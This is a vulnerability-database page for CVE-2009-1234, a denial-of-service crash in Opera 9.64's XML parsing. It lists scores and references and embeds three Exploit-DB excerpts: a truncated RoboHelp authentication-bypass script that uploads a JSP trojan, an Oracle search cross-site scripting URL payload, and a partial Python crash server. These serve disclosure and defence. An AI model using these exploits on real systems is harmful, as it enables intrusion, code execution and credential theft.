CVE-2009-1234
published 2009-04-02CVE-2009-1234: Opera 9.64 allows remote attackers to cause a denial of service (application crash) via an XML document containing a long series of start-tags with no…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
7.20%
93.5th percentile
Opera 9.64 allows remote attackers to cause a denial of service (application crash) via an XML document containing a long series of start-tags with no corresponding end-tags. NOTE: it was later reported that 9.52 is also affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Adobe RoboHelp Server 8 - Authentication Bypass
exploitdb·2009-09-03
CVE-2009-3068 Adobe RoboHelp Server 8 - Authentication Bypass
Adobe RoboHelp Server 8 - Authentication Bypass
---
source: https://www.securityfocus.com/bid/36245/info
Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges.
RoboHelp Server 8.0 is affected; other versions may also be vulnerable.
b="-----------------------------111\r\n"
b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
b+="Content-Type: application/x-java-archive\r\n\r\n"
b+=data # source code of our JSP trojan here
b+="\r\n"
b+="-----------------------------111--\r\n"
s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: Mozilla\r\n"
s+="UID: 1234\r\n"
s+="Content-Type: multipart/form-d
Exploit-DB
Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting
exploitdb·2009-06-14
CVE-2009-1968 Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting
Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/35681/info
Oracle Database is prone to a cross-site scripting vulnerability that affects the Secure Enterprise Search component.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com:7777/search/query/search?search.timezone=&search_p_groups="'>&q=1234&btnSearch=Search
Exploit-DB
Opera 9.64 - 7400 nested elements XML Parsing Remote Crash
exploitdb·2009-03-30
CVE-2009-1234 Opera 9.64 - 7400 nested elements XML Parsing Remote Crash
Opera 9.64 - 7400 nested elements XML Parsing Remote Crash
---
#
# Author : Ahmed Obied ([email protected])
#
# - Similar to the bug found by Wojciech Pawlikowski for Firefox
# -> http://www.milw0rm.com/exploits/8306
#
# - Tested using the latest version of Opera (9.64)
#
# Usage : python opera.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_exploit(self):
exploit = '' * 7400
exploit = '' + exploit + ''
return exploit
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
print '[-] Sending header to %s ...' % self.client_address[0]
self.send_response(200)
self.send_header('Content-t
No writeups or analysis indexed.
http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.htmlhttp://websecurity.com.ua/3216/http://www.securityfocus.com/bid/34298https://exchange.xforce.ibmcloud.com/vulnerabilities/49522https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5432https://www.exploit-db.com/exploits/8320http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.htmlhttp://websecurity.com.ua/3216/http://www.securityfocus.com/bid/34298https://exchange.xforce.ibmcloud.com/vulnerabilities/49522https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5432https://www.exploit-db.com/exploits/8320
2009-04-02
Published